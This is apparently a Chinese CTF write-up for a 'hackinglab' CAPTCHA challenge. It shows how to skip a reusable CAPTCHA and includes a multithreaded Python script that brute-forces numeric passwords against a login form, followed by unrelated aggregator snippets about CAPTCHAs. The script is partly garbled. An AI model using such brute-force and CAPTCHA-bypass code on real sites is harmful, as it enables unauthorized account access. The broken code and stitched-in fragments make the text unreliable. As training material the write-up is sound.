hackinglab 逗比驗證碼第二期

2021-08-01 19:25:33 字數 1690 閱讀 9525

逗比驗證碼第二期

分值: 150

驗證便失效的驗證碼

登陸一下,用burp抓包

將這個登入請求匯入repeater,經測試,把驗證碼刪掉,可以正常傳送請求。

原因應該是請求頭包含了兩句:

connection: keep-alive

upgrade-insecure-requests: 1

這樣就好辦了,同樣是多執行緒爆破,省去了驗證碼。**如下

import requests, re

import threading

url = ''

login = ''

s = requests.session()

c = s.get(url).content.decode('utf-8')

print (c)

lock=threading.lock()

curtask = 1000

maxtask = 10000

flag = false

right = ''

header =

def thread():

global lock

global curtask

global maxtask

global flag

global right

global header

while not flag: # 當flag為假也就是正確密碼還沒出來時,不斷取任務來完成

lock.acquire() #取任務 #這個過程不能被打斷

mytask = curtask

curtask = curtask + 1

lock.release()

if mytask >= maxtask:#所有任務已經完成就退出

break

data =

c1 = s.post(login, data=data, headers=header).content.decode('utf-8')

print (str(mytask) + ':' + c1)

if 'error' not in c1:

right = str(mytask) + ', ' + c1

flag = true # 當密碼正確時,flag為真

# 多執行緒執行

threadnum = 50

threadlist =

for i in range(threadnum):

for i in threadlist:

i.start()

for i in threadlist:

i.join()

# 最終輸出正確結果

print ('pwd is ' + right)

得到結果:

key是:ljljl789ss33fasvxcvsdf#@sd

驗證碼 簡單驗證碼識別

這裡的驗證碼是內容非常簡單的,結構非常清晰的 這裡的驗證碼是內容非常簡單的,結構非常清晰的 這裡的驗證碼是內容非常簡單的,結構非常清晰的 興之所至之所以說簡單,我覺得是這樣的 抽了五張驗證碼扔進ps,50 透明度,長這樣 只有數字為內容 每張圖的數字都在固定位置 沒有太大的干擾因素 數字字型,形態完...

驗證碼一(驗證碼生成)

根據手機好查詢密碼 return type description code for i 0 i 6 i 4位驗證碼也可以用rand 1000,9999 直接生成 將生成的驗證碼寫入session,備驗證時用 session start session verify num code 建立,定義顏色...

12306驗證碼 驗證碼的架構

最近和眾屌絲一樣,在12306上面刷著春節回家的票。與她大戰無數個回合之後,終於搶到了一張回家的高鐵票,不斷感慨最近人品還不錯。當前,在使用12306的過程中,充滿很多的心酸,念叨了鐵道部的親人很多次 罪過 其中最讓人糾結的一項即是 驗證碼。12306採用驗證碼,無疑是一種很不錯的措施,可以在一定程...